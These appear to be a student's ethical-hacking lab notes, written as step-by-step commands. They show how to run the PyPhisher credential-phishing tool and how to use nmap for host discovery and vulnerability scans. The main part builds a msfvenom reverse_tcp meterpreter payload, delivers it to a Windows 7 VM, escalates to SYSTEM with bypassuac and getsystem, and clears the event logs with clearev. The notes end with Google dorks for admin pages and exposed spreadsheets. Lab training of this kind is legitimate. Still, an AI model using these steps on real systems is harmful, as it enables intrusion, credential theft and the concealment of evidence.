phishing using pyphisher

git clone the tool from github

cd in to the pyphisher dirctory
~> cd pyphisher
then run the following command
~> python3 pyphisher.py
then customise the inputs accoring to your need copy the cloudflare url and paste
it in any browser
then enter your desired login credentials upon login the credential will be
reflected in the pyphisher terminal

ping sweeping (live host discovery )

open the kali terminal and type the following command
~> nmap -sn {network id of the current local ip . and the last octet or the host id
part being 0 as defaault}/{default subnet 24}
Example ~> nmap -sn 192.168.10.0/24

nmap -sV {TARGET IP ADDRESS} -Pn -v -sS -sC -A --script vuln -p- -oN
{FILENAME.EXTENSION}
the above command covers all the switches for nmap in which

-sV is used for service and version scan

-sC is used to run all the default scripts within nmap hence it by default runs a
vulnerability scan
or we can specifically run a vulnerability scan by using the command
~> --script vuln

window hacking

LAB 1 & 2
METASPLOIT & LOG CLEARANCE
Attacker machine – Kali linux
Victim Machine – windows 7
Creating the virus.
Step 1 – go to windows button > search for VMware Workstation Pro > Click on it.
Step 2 – on the left hand side, there are virtual machines, Click on ‘ Kali ’ & ‘
Windows 7 ‘ individually > then click on ‘ power on this virtual machine ‘ on both.
Step 3 – give the password > psycho100
Step 4 – Open the terminal on Kali.
Now to create a virus.
Step 5 – after opening the terminal, write >
‘ msfvenom -p windows/meterpreter/reverse_tcp LHOST=(paste the IP) LPORT=9000 -f
exe > virus.exe ‘ > click enter and wait
(msfvenom is a tool, which we will create the virus with. -p is payload, in hacking
terminology we use the word payload instead of virus, meterpretor is giving us a
terminal to access the virus, we’re creating the virus for windows. Reverse tcp
means windows is giving us the connection, not the other way around. To find the IP
of Kali, open a new terminal and write ‘ ip a ‘ or ‘ ifconfig ‘, copy the IP and
paste it, to copy from a terminal, its > ctrl shift c and paste is > ctrl shift v.
Port is where you want to establish you connection from. (filename.exe) for the exe
part, to check is the virus is ready, you can search it in the folder)
Transferring the virus
(if we want to transfer the virus, we need to start a python server, so that we can
download the virus on windows 7)
Step 6 – write ‘ python3 -m http.server ‘ > click enter
(-m is used for module)
Step 7 – go to windows now and click any browser, firefox, edge etc > type the IP
of kali then : , then python server port, ex – 192.168.16.129:8000. > click enter >
download the virus you created from that page.
(you see the port for python server, that is 8000)
Step 8 – now to stop the server, click ‘ control c ‘ > ctrl c
Setting up the listener
Step 9 – now to set a listener to receive the connection > write ‘msfconsole’. .
wait for it to open.
Step 10 – our first command is > ‘ use multi/handler ‘ > click enter. Then to check
if its running, see if the exploit(multi/handler) is in red.
(multi/handler is inbuilt in module, it is capable of handling multiple viruses at
the same time)
Setting parameter
Step 11 – write on the exploit > set lhost 192.168.16.129 (write ip again) . click
enter
(writing ‘lhost’ in caps or small here in shell, doesn’t matter. We wrote it before
because when we’re creating it, it is needed.)
Step 12 – in the same way set lport > set lport 9000
Step 13 – ‘ set payload windows/meterpreter/reverse_tcp ‘
Step 14 – to check if the configurations are done right write > ‘ options ‘
(options is to check if the connections are established or not)
Step 15 – now, write > ‘ run’ or ‘ exploit’ > as the command
Installing the virus on windows 7
Step 16 – When you see that the meterpreter word is on the kali terminal, think
your windows 7 is done for.
Step 17 – to check the connection is established or not, write > ‘ getuid ‘ >
enter. If you see win and the name ‘hohenheim’… then you’re just double sure your
windows is done. 😉
Step 18 – after checking if its hacked or not, write > sysinfo > enter
Step 19 – you can write screenshare command to check and close it by ctrl c.
Now the windows part
Step 20 – now in windows to check if my device is hacked or not, open cmd > write >
netstat – an> is kali linux ip is seen, you’ll now its fucked. Bdw port 80 is
responsible for browsing.. so established connection on port 80 is sussy.

LAB – 2
Step 21 – write > ‘ bg ‘ > enter
(we’re making the meterpreter the background here.)
Step 22 – write on exploit > ‘ search bypassuac ‘ > enter
(to get the full control over the windows, we need to shift from local to
administrator)
Step 23 – then write > ‘ use 2 ‘ > enter
Step 24 – to check if it works, the red multi/handler will change into red
windows/local/bypass, now write > ‘ set session 1 ‘ > enter > then write ‘run’
(set session 1 is because there only one initial created virus)
Step 25 – again check for meterpretor to know we fucked that shit up > write “
getuid “ > no authority > write “ getsystem” > now again > “getuid”, then you see
the authority
Step 26 – go to windows > open event viewer
Step 27 – again go to kali > write ‘ clearev ‘
Step 28 – it’ll change. Refresh by cutting of the tab.. the old ways fir click on
action.
Step 29 – to exit, type ‘exit -y’, lastly exit.

google dorking
to gather information about amazon

enter following commands in your google search engine

intitle:amazon

to find amazon admin pages

enter following commands in your google search engine

inurl:"amazon admin" intitle:"amazon admin"

to dork excel files

enter following commands in your google search engine

intitle:marks filetype:xlsx